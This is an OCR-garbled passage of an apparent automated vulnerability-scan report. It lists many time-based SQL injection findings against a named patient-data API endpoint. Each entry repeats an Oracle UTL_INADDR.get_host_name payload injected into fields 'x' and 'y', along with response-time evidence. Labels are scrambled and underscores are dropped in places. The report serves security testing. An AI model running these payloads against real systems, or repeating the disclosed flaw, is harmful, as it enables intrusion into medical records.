Other Info The query time is controllable using parameter value [251" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [8,124] milliseconds, when the original unmodified query with value [251] took [788] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

POST

Attack

field: [x], value [282 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Other

Info

The query time is controllable using parameter value [282 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,393] milliseconds, when the original unmodified query with value [282] took [1,141] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

field: [x], value [305" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [305" / (SELECT UTL_INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [6,803] milliseconds, when the original unmodified query with value [305] took [264] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [312' / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

Attack

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / ']

Evidence

Other Info

The query time is controllable using parameter value [312' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [6,641] milliseconds, when the original unmodified query with value [312] took [1,284] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [317 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

Other Info

The query time is controllable using parameter value [317 / (SELECT UTL INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [9,698] milliseconds, when the original unmodified query with value [317] took [1,229] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [439" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [439" / (SELECT UTL_INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [7,256] milliseconds, when the original unmodified query with value [439] took [777]

milliseconds

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [444" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [444" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [5,692] milliseconds, when the original unmodified query with value [444] took [264] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

POST

POST

Attack

field: [x], value [456 and exists (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name ('10.0.0.5') from dual) -- 1

Evidence

Other Info

The query time is controllable using parameter value [456 and exists (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) --], which caused the request to take [9,928] milliseconds, when the original unmodified query with value [456] took [767] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

field: [x], value [514' / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / ']

Attack

Evidence

The query time is controllable using parameter value [514' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [7,779] milliseconds, when the original unmodified query with value [514] took [1,496] milliseconds

Info

URL

Other

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

field: [x], value [517" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

Attack

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [517" / (SELECT UTL_INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual

Other Info

union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [6,511] milliseconds, when the original unmodified query with value [517] took [1,026] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [x], value [549 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Attack

Evidence

The query time is controllable using parameter value [549 / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,204] milliseconds, when the original unmodified query with value [549] took [782] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [561" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Other Info

The guery time is controllable using parameter value [561" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [6,746] milliseconds, when the original unmodified guery with value [561] took [1,088] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [744" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

Attack

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Other Info

The guery time is controllable using parameter value [744" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [7,746] milliseconds, when the original unmodified query with value [744] took [835] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [748.8941176470588 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.

Attack

get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name ('10.0.0.5') from dual) 1

Evidence

The query time is controllable using parameter value [748.8941176470588 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [6,853] milliseconds, when the original unmodified query with value [748.8941176470588] took [783] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Other

Info

POST

field: [x], value [748.8941176470588 and exists (SELECT UTL INADDR.get host name ('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual

Attack

union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT

UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR. get host name('10.0.0.5') from dual) --]

Evidence

The query time is controllable using parameter value [748.8941176470588 and exists

(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.

Other Info

get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR get host name('10.0.0.5') from dual) --], which caused the request to take [8,001] milliseconds, when the original unmodified query with value

[748.8941176470588] took [1,561] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [x], value [758.0549019607843 and exists (SELECT UTL INADDR.get host name ('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT

UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.

get host name('10.0.0.5') from dual) --]

Evidence

Attack

Other

Info

URL

The query time is controllable using parameter value [758.0549019607843 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR get host name('10.0.0.5') from dual) --], which caused the request to take [8,451] milliseconds, when the original unmodified guery with value

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [x], value [762.635294117647 and exists (SELECT UTL INADDR.get host name ('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.

get host name('10.0.0.5') from dual) --]

[758.0549019607843] took [794] milliseconds

Evidence

Attack

Other

Info

The query time is controllable using parameter value [762.635294117647 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL_INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get_host_name('10.0.0.5') from dual) --], which caused the request to take [7,818] milliseconds, when the original unmodified guery with value

[762.635294117647] took [778] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

> field: [x], value [767.2156862745097 and exists (SELECT UTL INADDR.get host name ('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.

get host name('10.0.0.5') from dual) --]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [767.2156862745097 and exists (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) --], which caused the request to take [7,085] milliseconds, when the original unmodified guery with value

[767.2156862745097] took [1,756] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST** field: [x], value [806.1490196078431 / (SELECT UTL_INADDR.get_host_name('10.0.0.1')

from dual union SELECT UTL INADDR get host name('10.0.0.2') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR. get host name('10.0.0.4') from dual union SELECT UTL_INADDR.get host name

('10.0.0.5') from dual)]

Evidence

Other

Info

Attack

The query time is controllable using parameter value [806.1490196078431 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.

get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,347] milliseconds, when the original unmodified query with value

[806.1490196078431] took [760] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

field: [x], value [939 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR. get host name('10.0.0.4') from dual union SELECT UTL_INADDR.get host name

('10.0.0.5') from dual) --]

Evidence

Other

Info

Attack

The query time is controllable using parameter value [939 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) --], which caused the request to take [6,350] milliseconds, when the original unmodified guery with value [939]

took [1,148] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [x], value [97" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [97" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [12,177] milliseconds, when the original unmodified query with value [97] took [1,464]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

Other

Info

Attack

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [12,533] milliseconds, when the original unmodified query with value [56] took [1,692]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack

field: [y], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,200] milliseconds, when the original unmodified query with value [376.2601248946844]

took [774] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

field: [y], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,550] milliseconds, when the original unmodified query with value [215] took [778]

milliseconds

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

field: [y], value [(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT

UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,180] milliseconds, when the original unmodified query with value [309.8444386201746]

took [1,098] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method **POST**

field: [y], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,298] milliseconds, when the original unmodified query with value [150] took [798]

Other Info

Other

Info

Attack

Other Info

Attack

Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7.425] milliseconds, when the original unmodified query with value [132] took [1.913]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Other

Info

Attack

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,567] milliseconds, when the original unmodified guery with value [1058] took [1,832]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get host_name('10.0.0.5') from dual)]

Evidence

Other

Info

Attack

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7.642] milliseconds, when the original unmodified guery with value [407] took [1.542]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [10" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [10" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [7,537] milliseconds, when the original unmodified query with value [10] took [980]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method **POST**

field: [y], value [12 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union

SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.

get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [12 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take

[7,381] milliseconds, when the original unmodified query with value [12] took [1,506]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method **POST**

> field: [y], value [12" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.

> get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [12" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [8,484] milliseconds, when the original unmodified query with value [12] took [1,411]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [y], value [139 and exists (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.

get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.5') from dual) --]

Evidence

Other

Info

Attack

The query time is controllable using parameter value [139 and exists (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) --], which caused the request to take [9,710] milliseconds, when the original unmodified query with value [139]

took [1,544] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [y], value [169 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

The query time is controllable using parameter value [169 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual

union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT

Other

Info

Attack

Evidence

UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,972] milliseconds, when the original unmodified guery with value [169] took [776]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [y], value [176' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.

get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / ']

Evidence

Other

Info

Attack

The guery time is controllable using parameter value [176' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [9,738] milliseconds, when the original unmodified query with value [176] took [2,574]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [y], value [193" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

> ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Attack

Other

